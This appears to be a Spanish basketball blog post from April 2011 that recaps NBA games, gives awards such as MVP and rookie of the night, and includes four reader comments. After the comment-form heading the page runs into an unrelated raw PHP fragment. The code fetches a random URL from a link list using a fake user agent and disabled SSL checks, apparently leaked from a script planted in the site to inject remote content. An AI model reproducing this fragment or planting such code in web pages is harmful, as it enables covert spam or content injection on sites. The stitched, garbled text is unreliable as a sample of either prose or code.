La Crónica (08/04/2011)

09 de April de 2011 por TheDeerHunter

Asegurada la primera plaza del Este por los Bulls. Contra Cleveland no hizo falta una gran versión suya para lograrla. Partido comedido de Rose, el mejor fue Boozer.

A Heat y Celtics les queda pelearse por la hipotética ventaja campo en 2ª ronda y, de paso, observan de reojo el viacrucis por el que atraviesan los Lakers en estos restos de regular. Anoche cuarta derrota consecutiva, esta vez en el Rose Garden, dando una imagen penosa. Pau y Bynum encabezaron el despropósito combinando con esmero una defensa patética con un ataque lamentable. Sin juego interior los Blazers bailaron a los campeones en un partido impecable de Aldridge y el resto de titulares en dobles dígitos. Ellos y nosotros necesitamos que lo serio empiece inmediatamente. Los Celtics no tuvieron problemas contra Washington, como no los suelen tener contra nadie cuando Rondo juega a su verdadero nivel. Bonito duelo contra John Wall. Miami por su parte tampoco sufrió contra Bobcats y eso que Kwane Brown parecía Wilt Chamberlain. Recuperaron a Wade.

Los Mavs, por su parte, mantienen opciones de adelantar a Lakers. Los Clippers no se lo pusieron fácil pero volvía Chandler y disfrutaron de una extraordinaria versión de Corey Brewer. Próximamente debería volver Butler, cuidado.

Como último dato noticioso los Grizzlies aseguran su presencia en postemporada por primera vez desde los tiempos de Pau. Lo hicieron ante los Kings con un gran partido colectivo en general y de Zach Randolph en particular.

En el resto de partidos había bastante poco en juego. Todo el mundo está pensando más en playoffs o en vacaciones que en el correspondiente compromiso. Así los Pacers ganaron a Atlanta; los Knicks se llevaron el derbi contra New Jersey; Philly ganó a Toronto, Detroit a Milwaukee, New Orleans a Phoenix y Oklahoma a Denver.

PREMIOS

MVP: Los Grizzlies cierran su primera participación en los Playoffs en 5 años con un gran partido de Zach Randolph que ha dado un rendimiento inesperado a la franquicia. Anoche fueron 27 puntos, 14 rebotes, 4 asistencias y 4 robos.

Rookie: Una más de Blake Griffin. 23 puntos, 9 rebotes 6 asistencias y 2 robos. Lo hace tan a menudo que estamos perdiendo de vista lo enorme que está siendo su temporada.

Sorpresa: ¿Alguien se acuerda de que pasaba en los Sixers cuando Allen Iverson se lesionaba? Pues que salía Willie Green y asumía perfectamente su rol tirándose hasta las zapatillas. Ayer Willie pudo recordar esa sensación con los 17 tiros que se autoregaló. Acabó el partido con 31 puntos. A Chris Wilcox también se le apareció la virgen. 27 puntos y 13 rebotes en apenas 24 minutos de juego.

Decepción: La doble personalidad de Carlos Delfino es de psicólogo. Un día puede meter 6 triples y ser el mejor del partido, y al otro, como ayer, fallar sus 7 lanzamientos canasta. Mención especial para John Wall que anochó perdió hasta 7 balones. Su media en los 4 partidos de abril es de 6. Impresionante.

Esfuerzo en vano: Record anotador de la temporada para Brandon Jennings totalmente infructuoso. 31 puntos que no sirvieron para doblegar a los todopoderosos Pistons.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Len Bias dice:
    #1

    Y Willie Green hizo los 31 puntos sin fallo momentáneo. Anotó sus primeros 12 tiros a canasta, lo que luego falló 5 más (12-17)

      Citar

  2. Len Bias dice:
    #2

    La que está liando Lawson desde la línea de 3… 10-10 de momento.

      Citar

  3. CAMPO2 dice:
    #3

    La fabrica de rumores de hoopsype y sus cantos de sirena dicen o suponen que Miami traspasaran a Bosh el año que viene , alguien se lo cree?

      Citar

  4. Viva_Dirk dice:
    #4

    No tiene demasiado sentido la verdad y desde luego va a depender de los resultados que tengan en estos play-offs. Equipos para moverlo hay de sobra, por ejemplo Denver podria darles algo como Felton+Al Harrington+Andersen, porque no creo que Nene salga facilmente. Y después otros como Atlanta, Houston, Portland u Oklahoma estarian muy interesados.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>